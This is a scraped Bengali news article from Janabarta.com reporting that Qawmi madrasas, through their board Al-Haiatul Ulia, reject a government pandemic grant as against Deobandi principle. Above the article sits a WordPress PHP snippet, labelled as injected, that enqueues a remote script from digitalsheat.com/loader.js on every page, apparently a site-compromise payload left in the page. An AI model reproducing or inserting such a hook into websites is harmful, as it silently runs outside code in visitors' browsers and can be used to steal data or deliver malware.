// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site সরকারি অনুদান নেবে না কওমি মাদরাসা - Janabarta.com

সরকারি অনুদান নেবে না কওমি মাদরাসা

রাজধানীর মিরপুরে অবস্থিত জামিয়া হোসাইনিয়া ইসলামিয়া আরজাবাদ

নিজস্ব প্রতিবেদক: মহামারি করোনাভাইরাসের কারণে সবাই সঙ্কটে। কওমি মাদরাসাগুলো যেহেতু বেশিরভাব ক্ষেত্রেই বিত্তবানদের অর্থে চলে, তাই সঙ্কটটা সেখানে কয়েকগুণ বেশি। এই বিবেচনায় সরকার ৬৯৫৯টি কওমি মাদরাসার জন্য ৮ কোটি ৩১ লাখ ২৫ হাজার টাকা অনুদান দিয়েছিল। কিন্তু সেই অর্থ প্রত্যাখ্যান করেছে কওমি মাদরাসা। তাদের শিক্ষাবোর্ড ও সর্বোচ্চ নিয়ন্ত্রক সংস্থা আল হাইয়াতুল উলায়া থেকে এই অর্থ গ্রহণ না করার কথা স্পষ্ট জানিয়ে দেওয়া হয়েছে।

হাইয়াতুল উলায়ার শীর্ষ কর্মকর্তা মাওলানা মাহফুজুল হক বলেন, ‘আমাদের অবস্থান পরিষ্কার, সরকারের কোনো অনুদান গ্রহণ করা হবে না। বলা বাহুল্য, এটা আমাদের নীতি ও আদর্শবিরোধী। আমাদের অভিভাবক আল্লামা শফীও অর্থ গ্রহণ না করার এই সিদ্ধান্ত অনুমোদন করেছেন।’

গতকাল গণমাধ্যমে পাঠানো এক বিবৃতিতে বলা হয়, কওমি মাদরাসা আগেও সরকারি অনুদান গ্রহণ করেনি, এখনও করবে না। যে দেওবন্দ মাদরাসার আদলে এ দেশের কওমি মাদরাসাগুলো পরিচালিত হয়, সেই দেওবন্দের অন্যতম মূলনীতি হল সরকারের কাছ থেকে অনুদান গ্রহণ না করা। তাই এদেশের কওমি মাদরাসাগুলোও ওই নীতির বাইরে যায় না।

নাম প্রকাশে অনিচ্ছুক কওমি শিক্ষাবোর্ডের একজন শীর্ষ আলেম বলেন, অনুদানের নামে আমরা সরকারের এই পাতা ফাঁদে পা দিতে চাই না। এমনিতেই কওমি মাদরাসাগুলো পরিচালনার ক্ষেত্রে সরকার নানা নিয়ন্ত্রণ আরোপ করতে চায়। এই অর্থ গ্রহণ করলে সরকারের সেই প্রবণতা আরো বৃদ্ধি পাবে বলে আমরা মনে করি।